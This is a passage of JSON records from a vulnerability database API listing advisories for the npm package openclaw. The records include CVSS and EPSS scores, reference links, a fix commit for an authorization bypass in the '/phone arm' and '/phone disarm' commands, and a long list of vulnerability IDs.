                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8f9r-gr6r-x63q",
                    "reference_id": "GHSA-8f9r-gr6r-x63q",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-8f9r-gr6r-x63q"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "GHSA-8f9r-gr6r-x63q"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-te8f-snty-j7hh"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89104?format=api",
            "vulnerability_id": "VCID-tf28-1z2z-5yfn",
            "summary": "OpenClaw: `/phone arm`/`/phone disarm` Bypasses `operator.admin` Scope Check for External Channels\n## Summary\n`/phone arm`/`/phone disarm` Bypasses `operator.admin` Scope Check for External Channels\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Maintainers accepted this issue, fixed it in aa66ae1fc797d3298cc409ed2c5da69a89950a45 on 2026-03-27, and that fix shipped in v2026.3.28, so normalize it as a fixed released draft rather than a close-by-trust-model call.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `aa66ae1fc797d3298cc409ed2c5da69a89950a45` — 2026-03-27T20:35:42Z\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41375",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00088",
                            "scoring_system": "epss",
                            "scoring_elements": "0.25193",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00088",
                            "scoring_system": "epss",
                            "scoring_elements": "0.2513",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00088",
                            "scoring_system": "epss",
                            "scoring_elements": "0.25179",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41375"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h2v7-xc88-xx8c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:26:54Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h2v7-xc88-xx8c"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/aa66ae1fc797d3298cc409ed2c5da69a89950a45",
                    "reference_id": "aa66ae1fc797d3298cc409ed2c5da69a89950a45",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:26:54Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/aa66ae1fc797d3298cc409ed2c5da69a89950a45"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41375",
                    "reference_id": "CVE-2026-41375",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41375"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-h2v7-xc88-xx8c",
                    "reference_id": "GHSA-h2v7-xc88-xx8c",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-h2v7-xc88-xx8c"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-phone-arm-and-phone-disarm-endpoints",
                    "reference_id": "openclaw-authorization-bypass-in-phone-arm-and-phone-disarm-endpoints",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:26:54Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-phone-arm-and-phone-disarm-endpoints"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
